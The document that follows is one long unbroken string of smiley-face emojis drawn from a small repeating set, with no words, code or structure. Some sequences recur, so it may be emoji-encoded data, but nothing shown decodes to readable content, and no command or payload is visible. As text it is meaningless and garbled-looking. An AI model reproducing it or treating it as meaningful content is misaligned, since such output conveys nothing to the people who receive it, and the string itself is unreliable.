🙃🤣🙂😇😜🙂🤣😉😊🤣😜😃😆😆😂😃😝😄😅😊🤪😉😂🙃😃😊😂😂😜😉🙃😂😆😉😝😅😅😉😜😂🙂😀😀😜🙃🤪😀😊😝🙂😃😅😃😅🤣😁😜😃😊😊😃😇😉😅😁😆😇😁😊😉😀😅😅😀🙂🙂😝😊😄😁😃😃😁🤪😇😉😅🙃🤪🙂🤪😅🤣😊😀😇😄😂😊😜😆😄😝😃🤣😀😆😃😊😝😃😃🙂😃🙃😄😃😉🙃🙃😀😃😅😜😊😊😄😝🙂😇🤣😉😆😅😇😃😅😀😝😜😊😃😁🤣🙃😉😀🙃😃😝😉😇😁😁🙃😄😜😆😅🙃😇🙃🤪😀🙃😀😉😃😄🤣😊😊😃😉🙂😀🤪😂😂😀😉😀😄🙃😊🙂😆😂😊🤪😉🤪🙃😄😝🙃😜😁😅😁🤣😆😇🙂😆🤪😝😝🤣😇😆😄😉😄😝😇😃😇😃🤣🙂😁😝😅😄😀😅😂😇🙃🙃😉😄😀😉😜😁🤪😆😆😇😊😅😝🤪😅😂😇😀🙂🙂🙂😃🙃😉😉🤣😉🤣🙃😜😄🙂😃😃😀😇😉😂😁🤣🤣🙂😝🙂🙂😝🤪😄😝🙂🤪😃😂😉🤣😁😅🙂😀😀😂😊🙃😅😆😀😉😜🤣🙂😄😉😝😁😇😇😊😅😉🤪🙃😂🙂😂😁😝🤣🤪😇😇😁😆😁😝😄🤣😃😆😄🙃😜🤪🙂😁😅😂🤪😊🙃😀🙂😀🤪😉😄🙃😂😃😃😂🤣😊😃😜😇😅😄🤪🤣🤪😀🤣😜😜🤪🙂😝😃😇🤣😊🙂😇😀🙃😊😝🤪😝😂🤣😀😅🙃😆😅🤪🙂😊😁😁😊🤣😝😇🙂😆😃😁😃😄🙃😊😄😉😊🙃😝🤣😊😆😃😂😁😄😄😂😜😜😁🙂😁😂😇😀😆😜😝🤪😜😜😄😇😄😄🙃😀😅😃😉😜😜😊😅😉🤪😅😂😆😀😁😀🙃🙂😄😃🙃😊😁🤣😁😅😝🤪😇😂😊😀😉🙃🙃😄🙂🤪🙃🙂🤣😀🙃🤣😉😜😁🙂😄😃😃😄😊😆😅😀🙂😂😅😝😃😇🤪😜😄🙃😅😃🙂😉😂😁🤣😃🙂😉😉😄😅😅🤪😜😝😉🤣😄😆😅🤣😜🙂🙃😁😄😄🙃🙃😂😀😀🙂🙃😂😄🤣😊😅😆😆😝😁🙃😁😁😃😆😂😃🤪🙃🤪😄😝😊😇🙂😊😆😁😇🤣😆😅😂😉😄😃😊😆😅😅😇😝😅🙃🙃😄😅😇😝😊😂😀🤪😜🤪😀😂🙃😇😉😅🙃🤪🙂😉🙃😃😊🙂😉😀😁😂😁🤪🙂😅🙃😝😁😆😁😊😄😄😀🙂😂😀😂😂🤪😜😄🤣🙂😝😆😅😃😇😃😄😜😉😄😃😅🙂🤪😜😂😅🤪🤪😅😅😇😇😂😁🙂😉😜😄😁🙃🙃😀🤣😂😊🤪😜😅😊😇😄😆🤣😊😆😃😊🙃🤪😀😝😂😆😜😂🤣🤣😇😝😅😀😊😜😄🤣😉😉😃🙂😂😜😀😄😂😃😝🙂😅😊😇😉😁😃😊😆😄😁🙂😉😀🤪😉😜😉🤪😁😂😇🤣😅😅🙃😃😊🙃😆🙃🤣😊😊😉😃😇😆😃😝😁😅😇🤪😊😂😉🙃😝😁😅🤣🤪🤣🤪🙂😇😂😁😅😉😜😄🙂😃😃😀🙃😜😄🤪😊😝🙂😊😃😊😀😀😀😀🙂🙂😃😂😉🤣🙃😊😁🤣😇😄😆😜😇😁😆😂😝😃😃😅😉😝😁😇😇😊😅😉🤪🙃😂🙂😄😁😝🤣🤪😇😊🤪😆😁😝😄🤣😃😆😃🤪😉🤣🙃😝😆🤣😇😜😜🙂🙃😀😄🙂😄😀😉🙂🙃😃🙃😉😆😁😁😇😄😉🤣😁😁😊🙂😁🙃🙃😀😄😆😉😊😁😉😇🙃😉😀😅😇🤪😁🤣🤣😀😄🙃😄😃😊😉😅🤣🤣🤣🙂🤪🤪😂😝😀😇😜🤪🙃😄😃😉😊😉😁🙂😇🙃🤣🙃🤪🙃🙂😅😝😅😁😃😇😀😆😜😝🤪🤣😝😜😇😇😇😅😉😂😀😁😇😇😂😅🤣🤪😅😝😅😀🤪😅😉🙃😆🤪😆😆😅😇🤪😅😝🤪😇😜🙃😜😅😃😁😝😝😂😊😊😁😇😝😂😆😜😁🙂😄😃😃🤪🙂😉😆😄😊😉🤪😆😉😝😉🤣😁🤪😝🤣😉😃🤣😉😅😁🙃😉😆😆😆🤪😆😂😅😜😅😄😅😉🤪😁😝😇😇😜😝🙂😃🙃🙂😉😃😝😂😄😁😉😝😆😝😝😁🤣😄😜😃😜😂😂😆😀😀🙃😅😄😊😊😉😆😅😊😄😁😇🙂😉😃😇😉😅😁😆😇😁🙂😇😀😇😇😃🙂😆🙂🙂🙃🙂😉😁😁😊😇😉😅🙃🤪🙂😂😂😀🤣😇🙃🤣😆🤪😂😆🙂😝😃🤣😀🤪😜😃😂😊😉😂😃😅😜🙂😇🤣😅😇😜🤣😂😜🤣🙂😅😃😆😉😁😂😄😃😂🙃😀😝😂🙂😁😜😝🙂😇😃😊🤪😝😂😉😇🙂😄😝🙃😆😜😄😀😁🙃😅😀😝🤣😃😝🙂😄😁🙂😜😉😁😆🤪😅😉😝😉🤣😉😇😆😄😅🙂😂😇😉😁😄🙂😁😃😄😉😃🤣😄😇😜😁🤪😉😆😃😉🙂🙃😜🤣🤣😄😝😀😁😉🙃😝😜🤪😂🙂🤪😇😅😅😇😀😁🙂😉😃😀🙃😂🤣🤪😁😅😆😇😁😄🤣🙂😂😀😅😂😁🤪🤣😅😀😊🤣😄😂🙃😊😀🙂😂😀😝😝😆😄😉😁😄😃🙂🙃🤪😉🤣😂😝😀😁😃😉🤪😃😂😂🙂😜😅😅🤪😊😜😁😝😉😅😀🤣🙂😁🤪😇😆😝😇😉😁😁🙃😆😃😃😂😉😝😊😅🙃😇😉🤣🙃😜😀😂😜😀🤪😝😜🙃😊😃😜😇😁😄😀🤪😃🤣🙃😜😅😀😝😊😀😁😁😇😄😅😃😄🤣😇😂😂😃🤪😂🤣🙃😜🤪🙃😁😁🙃😝😀😆😀😇😁😅😆😄🙃😄😁😊😄😆😃😝😀😅😜🤣🤪😇😁😆😇😀😀😁😂😊🙃😆🙂😝😂😊🙃😃😊😅😅🙂😇😝😊😀😊😀😊😂🤪😇🤪😃😇😅🤣🙃😅🤪😁😝😝😆😁😇😂😅🤣🤪😅😊🤣😅🤣🤪😉🤣😝🤪😂🤣😄🙃😜😆😆🤪😆🤣😊🤪😇😅😜😄🙂😊😂😆🤣😝😅🤣😆😜😁😇🤪😅😃😀😅😁😅😊🤪😆😝😝😇😅😄🙂😄😇😇😀😉😀🤣😝😝😅😊😅😉🤪😁😂😄😀😃😉😝😄😄😅😂🤪😀😆😊😆😀😆😜🙂🙂😀🙂🙃😂😄🤣😀😂😅🤣😂😝😇😀😉😆😀🙂😅😃🙃😄😊😂😜😝😁😀😅🙃🙂🙃😇🤣😜😜😉😇😉😊😁😆😇😁😅😄😆😉😀😉😆😜😉😃😃😁😇😝🙃😜😇😉😅🙃🤪🙂😂😂😀🤣🙃😅😆🤣😜😁😆😅😝😅🤣😀🤪😜😂🤪😅🙃😝😜😅😁😉😝😆😃😝🤪🤣😂😜🤣🙂😅😊😃😂😆😁😉🙂😀😂😁😊🤪🤣🤣😀😃🙂😇😃😊😉😉🙃😉😄😜😉🙂😃😂😂🙂😀😇🙃😁😄😄😊😃🙃😁🤪😉😁🙃😂🤣😊🙃😀😜😆😇🙃😇😊😀😅😉😝🤣🤣😅😜😆😝🤣😂😃😜😅😁😂😜😄🙂😉😃🙃😉😁😄🤣😉🤣🤪🙂😊🤪😁😇😂😝😄😅😝😂🤣🤣🤪🤪🤣😝😃🙂😇😄😁🤪😇😝😅😇😄😊🙂🤣😝😂😀😊😆😅🤣😁😉😂🤪😇😄😅😅🙃😉😀🙂😜😃😅😜😇😅😂😇😄😜😂😁😁😂😀😊😊😃😂😉🤣😁😅😇😆😅😁😉😄😇😆😆😀🙂😂😄😆😉😝😁😇😇😊😉😉😅😅😝🙃🙂😀😜😊🙃😂😃🙂😆😁😝😄🤣😃😜😀😂😜😀🤪😝😄🤣😇😊🤪😅😀😝🙃🤣🙂😜😂🤣😇😝😃😅😃😜😁🙃😁😊🤪😝🙂😉😝😜🤪🙂😝😃😇😝😝😃😂😅😂🙂🤣😇😊😀😅😁😜😂🙂😊😃🤪😇😃😉😆🙂🙂😜😝😀😀🤣😁🤪🙂😁😊🙃🤪🤪😄🙂🤣😄😉😀😝😇😀😇😁😉🙂😅😇😀😀😀😁😂🤣😉😉🙂🤪🙃😄😁😅🙂🙃😄😇😆😜😄😁😝😂😄😉😀🤪😉😄😀😆🤪🙃🙂😇🤪😜😇😆🤣😂😇😉😉😜😅😄😉😅🙂😉😄😝🙂😀🤣😅😀🙂🤣😊😆😜🤪😁😆🤣😄😉😝😊😄🤪😇🤣😊😜😉🙂🙃🤣😉😜😆😅🤣😝😆😜😁🙃😅😃😄🙂😂😜🙂😂😄🤪😃😁😝🤣😊😀😝🙃🙂😀😆😇😜🙃😝😄🤣😊😅😆😆🤣😃😜😉😉🤣🙂😂😇😃😇🙂😁😀😇😅😆😊😝😉🤣🙃😁😉😜🤣😂😉😃🤪😂😉😁😄😇😆😆😆😝😅🙃😅😇🤪😃😝😉😇😁😊😜😊😅😂😉😁😀😆😅🙃😉😝😀😅😅😆😉😜😀😁😅😃🙃😊😜🤪😅🙂😉😜😀😇😅😂😊😂😀😉😅😊😊😃😀😂🤣😁😉😜😜🙃🤣😄😊😇😀😝😅😜😊😝😃😁🤣😂😊🙃😀😜🤣🤣😊😂😀😃🤣😆😊🤪😀😜😅🙃😊😜😃😃😅😊😇😃😃😁😅😝😇😁😃😅😅😜😇🤣😃😂🤣😃😇😂😃🙃🤣😁😇🙃😃😊🤣😅😇😊😃😝🤣😂😇😉😄😆😊😝😃🙃😉🙂😁😂😇🤣😅😅🤣😆😇🙃😆😄😜🤣😄🤣😉😜😁🤪😇😝😀😁🙃😀😄🤪😇😜😇😄😇😇😆😇😆😊😝😆🤣😁😜😄🙃😆🙃😅🤣😀😄😝😆🤣🙃🤪😆😀😂😅😜🙃🙂🙂😃😂😜🙂🤣🤪😇🙂😄😇🙂🤪🤪🤪😀😊🙃😁😀🤪🙂😀😝😃🤣😃🤣🙃🤪🙃😂🙂😀😂🤪🙂😅😃😉😄😜😂😆😝😅😆😝😉😁😊🙃😊🤪😁😆😂🙃😊😝😉😁🤪🙃🙂🤪🤪🙂🤣😃😅😉😆😁😁😇😄😝😃😄😀😉😜😜🤣🙃😆😃😇😉😊😁😉😃😃😇😇😅😊🤪🤣😆😇😜🙃🙃😂😂🙃😆🤣😝😀😅😜🤪🤪😇🙃🤣😝😜😝🙂😜😄😅😝🤪🤪🙂🤣🤣😜😅🙂😆😂😄😜🙃🙃😇😃😀😇🙃😅😄😊😆😅😆😝😀🙂😄🤪😄🙂🙂😆😀😇😃😃😅😇😃😆🙂😇🤣😄🙂😊😀😁😜😇🤪😉😀😅😊🤪😝🤣😜🤪😀🙃😝😄😀😂😉🤪😊🤣😆😜😁🙂😄🤣😂😀😆😂😅😜😜🙂😇😀😄😁😇🤪🙃🙂🤪😀😊🙂😊😀🤪🙃😇😝😃🙃😜😇🤪😂😜😄😂😉🙂😃😇😉😃😄🤪😅😝🤪😉😂🙃😀🙂🙃😂😄🤣😂😅🙃😉😃😁😜🙂😜😜🙂😀😀😜🙃🤪😂😃🤪😂😁😀🤣🙂😊🤪😀😝😀🙃🙃🤪🙃😆😜🤪😂🙂😊😇😀😂😅😁😀😄🙃🤪😃😝😉😇😁😊😀😜😊😇😆🤣😝😀😆🤪😝😜🤣😂😉😃😂😆😉🙂😅🤪😀😊🙃😃😀😉🙃😆😄🤣🙂😃😆😜😝🙂🤣😂😜🤣😜🙂😆😊🙂😂😆😅😜🙃🤣😀😂😅😂🙂😜😝🙂😇😃😊😜😃🙃🤪😁😇😉😉😆😊🤪😂😂😉😜😇🙂😅😃🤣😂😆😝😅😅🤪🤪😝😂😇😆🤪😀🙃🙃😅😄😂😊🙃😀🙃😜😊😜😉🙂😁😃😄😉😃😁😁😃😜😊😇🙃😊🙃😃😝🤪🤪😜😄😄😉🙂😁😂😇🤣😊😇😆😅🤪😀🤣😂😀😆🙂😅😃😝😊😃😁😄🙃😀😜😃😂😉😀🙃🙃🙂😃😅🤣😃🙂😜😆😂🤣😅😝😄😂🙂😃😀🙃😜😄🤪😊😝😆😇😝😊🙃😀😁🙃🤪😝😄😂😉🤣😁😅😇😆😉😃😄🤣🙂😆🤪😃😁😂🙃😃😜😃😅😝😂😃😃😇😄🙂😉🙂😁🙂🙃😄😜😁😅😅😁😊😝🙃🤣😃😜😀😂😜😅😃😀🤣😉😀😄😆😇😆😁🤪😝🤣😜😉🙂😇😃😅😉😆😁😁😅😇😄😇😁🙃😄😇🙂🤣😆😇😃😜😊😆😁😉😇🙃😅🙂😄😂😊😇😃😇😂🙂🙂😉😃😃🙂😝😜😜😅😊🤪😅😂😝😀😇🙃😊😄😉😊🙃😆🙂😜😊😉🤣🤪😝🙃😀😃😁😉😄😁😃😃😁🙃😅😀😀😄🙃😊🙂😅😃😊😜🤪😃😂😁😜🤪😂😝🤪😆😀😉😀🙃🙃😄😄😃😊😀🙂😉😅😂😀😄😄😇🤣😊🙃🙂😇😇😄🙂😊😂😆🤣😝😅🤣😆😂😁😝🙃😅😃😉😁😁🤣😊🤪😆😝😝😇😊🤪🤣😉🤪😉🙂😜😃😅🙃😊😄🙃😊🙃🤪😜😂😄😀😃🙃😀🤣😀😜😄😂🤣😝😊😃😃😝😀😜😀🙃😂😄😊🙃😂😀😅😂😄😇😉🤣😄😜😃🙂😀😀😜🙃🤪😄😝😀😄🙂😊😁😜🤣😜😜🙂🙂😂😃🤣😆😅😉🙂🤪🤪😆😇😄😜😊😝😇🤣🙃😅😃😝😉😇😁😊😀😝😇🙂😅😉😝😇😆😝😀😉🙂😝😆🙃😅😃😝😃🤣😀🤪😜😝😀😆🤣😉😆😀🤣🤣🙃😂😝😃😀😂🤪🤪😊😆😀😊😃😃😄😅🤪😇😜😁🤣🤪😄😂😇😜😝🙂😇😃😊😜🙂🙃🤪😁😜😇😊😅😅🤪😁😂😂😀😄🙂🙂😄😅🙂😉😄😄😉😝😁😊😂😜😃😃🙃😉😄🙃😊🙂😁😆🙂😇😃😊😜😂😜😇😄😁😉😆😁🤪😊😜😆🤪😝😝😊😀🤣😁🤪🙃😅🤪😜😃😂😝😊🤣🙂🙂😊😊🤣😄😃🙃🙃😉😄😄😉😊😆😃😝😁😅😇🤪😊😂😉😆🤪😝🙂😁😃😉😃😀😅😅😝😇🙂😜🙂🙂😃😃😀🙃😜😂😜😁🙃😇😅😜🤣🤣😊🙃😀🙂😊😃😇😉🤣😁😅😇😆🙃😊😄🙂🙃🤪😀🙂🙂😃😄😃🤪😊😁😇😇😊😅😉😃😉🙃😉😀😉🙂🙂😀😃😂😇😜😇😂😂🤪🤪🤣😅😝🙂😆🤣😇😝😆😊😇🤣😆😁😊🤣😁😉😊😃😄🤣😉😀😃😉🙃😉😀😉😂🙂😀🤣🙂😆😜🤣🤣🤪🤪😇🤣😂🤪😆😅🙂😝😆😆😜😇😄😁😀😊😊😁😀🙃🤪😄🙂🙃🤪😀😇🙃🤣😀😇😂😉😀😆😂😉🤪🙂😂😁🤪🙂😅🤣🤪😀😅🤣😇😆😆🤪😇😆😁😄😊😇😁😄😉😀😄😊😜😀😄😀😉🙃😁🙂😇😂😊🤪😜🙂😇😆😃😜😀😊😄😀😂😂😂😝😇🤪😅😝🤪😇😉😝🤪🙂😄😄😅🤣🙃😁😝😅😀😜😆🙃😂😇😊😅🤪😉😃🙂😅😜😉😀😝🤣😀🤪😅😁🙂🙃😊🤪😜🙂😁😄😂😀😉😇😝😇😀😉😅😅🙃😀😝😀😀😂😁😉😂🙂😊🙃😜😁😄🙂🤣😄🙃😆😇😄😀😝😆😄😂😀😊😉😜😀😃🤪🤣🙂🙃🤪😇😇😃🤣😆😇😂😉😇😅😜😉😄🙂😂😄😉🙂😝🤣😄😀😅🤣🙂😆😇🤪😀😆😁😄😂😝😊😁😊😜😁😊😇😉😅🙃😄😊🙂😝😇🤪😃😉😀😊😂😂😝😊😃😂😅🤣🙃🙂🤪😅😝🙃🤣🤣😅😆😊🤣😄🙂🤣😆😉😂🤪😊😂😝😃😉😉😁😁😄😇😃😆😉😇😁😅😂😁😂🙂😊😀🤪😆😀😆😉😇🙂😅😂🤪🤣😇😂🤣🙃😀😁🙂🤪😃😉😉😁😁😀😝😄😅😄🤪😀😅🤪😀🤪🙃🙂😄😉😉🙂😁😝😇😉🤪😇🙃😀😃😄😉😃😁😀😜😜😊😇😆😉😇😊🤣😃😝😊😂😆😊😄🤣😃😃🤣😉😅😄😁😊🙃🙃🙂🙃😂😄😀😉😜😁🤪😊🤪😂😇😁🙃😀😉😄😝🙂😝😊😇😊🤣😆😅😝😆🤣😁😜😄😀😃😅😄😝😜😜😅😇😁😆😇😝😊🤣😉😆😝🤪😅🙃🙃😊🙃😆😝🤪😄😆😉🤪😄😂😃😀😀🙂😜😃🤪😄😝🙂😃😀😊😊😜😜😀😂🙂😀😂🙃🤣🙂😇😃🙃😊😂😁🙂😇🤣😅🤪😜😅😀😅🙃😝😄😇😊😊😆😉😝🙃🤣🙂😆🙂😇🤣😉😉😉😆😁😁😇😄😅😃🤪😀🤣😜😆😇😇😝🤪😁😊😀😁😉😇🙃😅🙂😄😂🙃😇😝😊😃😊🤣🙃😃😂😆😊😝😀😅😜🤪🤪😇😜😄😜🤣😂😊😊😊😀😃🤣🙂😇😇😇😀😝😅😇😂😂😉😄😁😃😇😀😆😜😝🤪🤣😝😆😆😇😊😂😜😊😂😁🙂😇😂😅🤣😄😊😝😝😂😃😜🤣🤣😂😃🙃😊😃😆😃😝😃😄😜🤪😁😂😁😀😅🙂😇😆😝😆😇😝😅🤣😆😜😁😁😁😊😆😅🤪😅😊😝😊😂🤣😝😆😂😃😜😉🙂🙃😃🙂😝😇😝😇😜😄😝😊😄😝😄😁🤣🤣😉😁😃😜😉🤪😁😝😀😇😂😜🤪🙂😁😆🙂🤣😊😇😃🙂😂😅😇🤣😃😄😂😃😂🙂😃🤣😃😅🙂🙂😀😊😅🙂😉😇😀😃😜😜😜🤪🙂😂😃🤣😉😅😃😄😆😁😇😇😉😁🤪🤪😁😉😜😄😃😝😉😇😁😊😇😉😅🙃😄🙂😇🙂😆🤣🙂😝😄😉😊😁😆😄😝😃😊😊😇🙃😄😂😇😜😄😁😀😆😃😜😆😜😝🙂🤣😂😜🤣😄🤣🤪😅🙃😜😇😂😅🤪😊😝😂😅😂😜😜😝🙂😇😃😊🤪😉🙂🤣😃😃🙂😀😀😂🤣😇😜🙃🤣😆🙃🙃😁😜😝😇😅🤣😝😅😜😊🙃😂😁🤪😊😝😄😃😊😝😆😂😝🤣🤣😅😆😅😇😄😃🤣😂🤪😉😆😅😅😅😅😝😝🤣😇😜😊🤪🤪🙂😄😃😊🙃😉😁😅😇😂😆🙂😁😉😀😝🙃😃😄😀😉😜🙃😀😜😊😅🤪😊😝😄😅🙂😄😇😇🤪🙂😂🙂😜😃😆😊😇🙂😀😅🙂😃😃😀🙃😜🤣🤪😜😊😅😁😉😂😊😃😁😊😊🙂😀😃🤣🙂😇😄😇😂😅😁😊🤪😄🤣😂😜😇😝😄😊😂😝🤪😄😜😜🤣😀🤪🙃😂🙂😀😂😂😀😄🤪😀😂🙃😅😄🤣😀🙂🙂🤣😃😇😀🤪🙃😝😄😇🤪😝😅😜😝😄😁😊😊😅😄😁🙃🙂😀😉😂🙂🤪😅😅😀😊😅😁😁😉😉😄😃🙂😂😜😇😂😀😝😇😆😝😊😜😁😀😉😆😀😝😂😄😜😆🤣😅😝😇😆😝😊😅😄🙂🙃🤪😀😊🙂😀🤪😝😅🙃😊🤪😁😜😉🤪😄😉🙃😊😀😊😂🙂🤪😅😅🤣😇🤪😁😇😊😃😃🤣😂😊😜🙃🤣🤪😝😇😅😂😇🤣😁😁😉😆😃😂🙂😅😜😂🤣😂😀😇😆😅😊🙃😁😄🙃😂😜😇😂😉🤪🤪😅😝😝😀😆🤣😊🙂😄🙂🙃😂😀😂😂🤪🤪🤪😅🙃😇😅😄😉😉😝😃😉🙂😝😀😅😂😀🤪😁😅😂😇🤣😁😂😉😅😆😉🙂😁😜😂😂😀😝😅😁😉😊😇😄🙂🙂😝😃😃😂😝😜🤣🤣😅😝😄😆🙂😊🙂😄😇🙃😝😀🤪😉😝🤪🤣😅😉😝😁😁🙂🙃😝😃🤪🙂😝😀😀😂🤣🤪🙂😅🙂😇😂😁😂😉🤪😃🤪🙂🙃😜😅😅😉😝🙂😆😜😊😊😁😅😉😆😃😃🙂🙃😜😆🤣🙂😝😇😆😇🤪😊😄😆🙃🙂😃😃😂🤣😝😊😅😇😇😊😆😂😊🙂😄🙂🙃😅😀😄😂😁🤪😊😅🙃😇🤪🤣😅😜😝🙂😇😃😊😉😉😁🙃😀🙂😉🙃😄🤣😂🙂😀😅🙃😁😄😄😊😃😉😃🙃😅😅🤪🤪😝😂😇😀😊🙃😉😄🙃😀😇🙂😂😇😝🤣😅😜😆🙂😁😃😄😉😃😊😀😀😜🙂🤪😃😃😂😜😜😊🙂😉😃🙃😜😅😆😃😂😀😉😄😝😜😊😇😃🙃🤣😝😉😃😇😆😊🙂😁😅😃😁😂😁😇😉😜😉😃😝😅😃🙂😝😉😉😝😉🤣😁😜😄🙂😃😃😇🤪😃😀🤪😅😜😁😊😜😜🤣😝😀😅🙂🙂😃😂😉🤣🙂🙃😁🤣😊😇😆🙃😝🙂🤣😅😀😃🤣😁😄😁😉😃😁🙃😇🤪😆🤪🙂😁😀😂🙃🤣😄😅😀😀🙃🙃😀😜🙂😁😊🤣😂🙃🙃😝😁😊😇😇😅😆😊😊😝😇🤣🤪😜😂🙂🤣😃😅😁😅😄🙃🙂😀🤣😇🙃😊😁🤣😜😅🙂😝😃😇😉😊😁😉😇🙃😅🙂😆😀😊🤣🙃😊🙃😉😄😁😊😄😆😃😀😉🤪😅😀🙂😊🤪🤣😀🤪😊😅🤪😊😜😆🙂😝😂🤣🤣😁🤣😜😃🙂😄😃😂🙃😜😁😆😊😆🤪😆🤣😝😜😇🙂😊😆🤣😊😆🤪🤪😊😂😃🙃😊🙂😝🙃😃😀🙃😄😄😃😊😀🙂😂😜😄😁😀😂🙃😇😆😀😅😅🤣🙂😝🙂🤪😀😃😅😊😉🤪🤪😂😃😂😃😃😉😀😄😜😊🤪😆😝😝😇😊🤪😁😉😊😝😃🤪😉😂😁🤣😇😅😅🤪😝😝🤣😄🤪😄😂😀😊😊😂😅😆😃😇😇😅😊🤪😉🤪🙃🤣🙃😀🙃🙃😉😆😊😆😇😝😁🤣😄😜😃😇🙃🙂😄🤪😉🙃😇😃😝😉😜😁😜😇😝😊🤪🙂😂😃🤣😉😅😁😆😇😁😅😄😄😆😊😀😇🤣🙃😅😃😝😉😇😁😊😃🙃😊😊😅😄😝😇🤣🙃😀🙃🙃😂😃🙂😆🙂😝😃🤣😀🤪😜😀😂😀😀🤪😃😅😉😉🙃😀🙂😁😇🤣😂😜🤣🙂😅😃😆😉😁😁😄😜😇🙃😀😉🤣😂🤣😜😝🙂😇😃😊😜😁😉😂😁😊😇😊😆😂🤪😁🤣😂😜🙂😊😂😊😃😆😀😇😜😅🤪🤪😝😂😇😅😝😝😉😄😇😝😁😆😂😝🤣🤣😅😆😀😉😉😃😄🤣🙃😊😀😃😁😃😂🙃🤣😀😜🤣😅😇😆😃🙂🤣😆😇😀😃😅🤣🤣😇🤣😃😝😄🤣😇🙂😇😊😅😀😇😇😄😃🤣🙃😇😄😄😁😀😃🙃🤪😄😂😊🤣😆😅😝🤪🙂😉😊😅🙂😝😆😊😉😊🤣😄😇😁😆😇😝😊🤣😉😝🙃🤣😊😝😜😁😁🙃😇🙃😁🙂😂🤪😉😂😃😀😀🙂😜🤣🤣😃😀🙂🤪😃😅😉😁😆😄😝😀😅😄😅😇😄😅😊😆😆😁😝😄🤣😃😂😀😇🤣😆🤪😀😄😁😄😊😊😆😉😝🙃🤪😊😁😊😊😜😆😂😀😊🙂😃😊🙃😅😃🤪😀🤣😜😜🤪🙂😝😃😇🤪😊😂😉😜😝🤣😃🤪😂😂🤣😀😅🤪😆🙂😜😃😁😊😉😁😅😝😃😁😅😜😄😂😅😁😃🤣🙂😊🙃😆🙂😝😂🙃🙃😇😇😜😜😁😄🤣😉🙃😜😝🤣😀🙃😆😄😂😊😉😁😇😇😀🤪😆😝🙂😃😉🤪🤪😊😃😉😆😜🙂😆😊😉😜😃😄😉😅😆😂😝😇😁😜🙂😄😝🤣😉🙃😆😝😆😀😁😁😊🤣😉😉😁😝😀😜🙃😁😜🤣😜🙃🙂😝😝😀🤪😁😂😂😇😉😝😝🤣😃😊😆😇😂😅😊😊🤪😊😃😆😅🙃🙂😉😊😁😜🙂😄🙃😅😄🙃😂😇🙂😜😃😁😂🤣😇🙃😂😄🤣😊😅😆😆😝😁🤪😄😁🙃😇😀😂😆😉😆😄😝😊😇😆😊😉😀🙃😃😁😁😀😝🤣😉😂😜😜😊😇🙃😅😄🤪😃😂😀😊😂🤪😂😁🤪😅😀🙃😅😇😁😄😀🤪🤪😂😂😀🤣🙃😅😊😄🤪🙂😆🤣😄🙂🤪😊😂😉😆😅😃😆🙃😇😄😊😊😉🙃😝😁😝😝😜🤣😉🤪😂🙂😁😃😊🤣🤣😇😉😅😀😝😜🤣🤪😁😜😇😉😁😉🙃😇😃😄😂😄🤪🤣😁😇😊😂😜😊🙃😁😄😄😊😃😆😀😇😜🙃🤪😆😀😊😇😁😜🙃😜😄🙃😊🙂😆😂😃🤣😇🙂😁😇😇🤣😁😉😝😅😁😊😊😜😆🤪😝😝😊😜😃🙃😅😇😅😝😇🙂😆😃😂😜😊🤣😀🙃😅😆🙂😇🙂🙂😄😀😉😜😁🤪😇😝😅😇🤪😊😇😆😆🙃😄🤪😁😃😊🤣😆😅😝😆😊🤣🤣😂😜😁😂🤣😀😀🙃😃😄😄🙃😁😅😀😝😁😜😀🙂🙂😃😂😉🤣😁😅😇😆😅😁😁😂😊😃😀😁🙃🤣😃🤪😉😝😁😇😁😁😇🤪😅😝🤪🙂😆😃😇😅😅😆😃🙂😆😁😝😄🤣😃😜😀😂😜😀🤪😇😂🤣😇😊😁😅🙃😝🙃🤣🙂😜😂😝🙂😁😝🙂😉😝😊😄😝😁😀😊😄😀😜🤣😊😉😜😀😜😅😜🙃😉😜😉😅😀🤪😉😂😇😀😅🙃😆😄😁😂😀😇😇😉😁😆🤣😂😜😄🤪😝😁😉😃😄😉😊🙃😆🙂😜😇🤪😜🤣🙂😜😝😉😀😆😄😜🙂😇🤣😆😜😝🤪🤣😝🤣😜😜😁😂😊😀😝😉😂😁🤪😅🙃😜😃😂😆😀😁🙃😄🤣😄🤪🙃🤣😄😊😇🤪😂🙃😊😊😀😆😇😝😅😁🤣🙃🙃😜😊🙃😇🤣😉😜😁🙂😄😃😃😉😇😇😃😄😜😄😇😇😄😊😇😅😜🙃😆😃🙂😉😂😁🤣😃🙂😉😇😄🙃🤣😆😀🙃😊😇😁😆😉😅😁😄😊😂😄🙃🤪😝🙂😆😀🙂🙃😂😄🤣😜🙂😉😝😆😂😇😊🤣😊🤪😅😂😝😃😃🙃😅😄😅😊😊😂😀😂😁😜🙂🙂😂😃🤣😃😃😉😁😄😆😊🤣😅😆🤪😆😂😃😜😂🙂😊😃😁😉😀😝😀😅🙃🤪🙂😂😂😅😊🤪😜😇😊😊😆🤪😅😉😊🙃😆😀😆😂🤪😀😝🙃😇🙂😜😄😁😊😇😁😊😝🤣🤣🙂🤪🙃😆😄😀😉🙃🙃😜😀😊😂😁😀😊😁😆😅😊🤪🙃😀😀😆😊😃😃😝😇😄😝🤪😂😊😀😆🙃😁😄😄😀😀🤣😃😃😝🤣😉😉🤣🙂🙃😁😜😉😁😄🙃😊🙂😆😂😄😁😇🤣😅😊😜😃😂😊😃😅😉😅😄😁😊😁😃😃😂😇😜😊🙂😉😃🙃😜🤣😂😃😇😅😃🙂🤣😆😊😆😀😉🤣😇😂🤣😃😂😃🙃🙂😜😃😅🤣😅😊😇😃😆🙂😜😄😂😊🤣😆😅😝😆🤣😁😜😄😇🙂😅😀🤣😅😄🤪😊😝😆😇😝😊🤣😉😜🙃😊🤪😅😂🤣😝😁😊😇😆😅😁🤪😄🙃😉😄😉😂😜😃🙂😀😆😜😄😇😁🤣😀🤪🙃😂🙂😀😂😉😅😆😊😄😂😃😄🙃😆😇😁😅😅🙂😅😀🤪🙃😝😄😇😂😆😂😆😇😝😝😆😀😄😃🤣😝😇😉😉😁😁😇😄😅😃😊🙂🙃🤪😆😁🙂🤪😉😁😁😜😁😄😝😆😅🙂🤪😂😂🤣😂😅😀🤣🙃😄😄🤣😉🤣😁😁😝😁😆😝🤪😆🙂😃😀😆😄😝😊😜😆🙂😝😂🤣🤣🤣😅😜😝🤣😉😇🤪🙂😜🙂😂😃🤣🤪😆🤣😝😜😇🙂😊😃🤣😅😇😇😀😇😉😝😜😄😇😝🙃😀😝🙃😄😄😃😊😀🙂😉😁😂😇😀😅😂😇😊😂🤣😜😉😉😃😃😇😊🙂😝🙂🤣🙂😜😁🙂😄😃😃🤪😅🙃😝😁😁😊😉😃😀😂😀😜😉🙂🙃😃🙂🤪😝😉😅😁😂😊😂😆🙂😁🙃😀😅🙃😀😃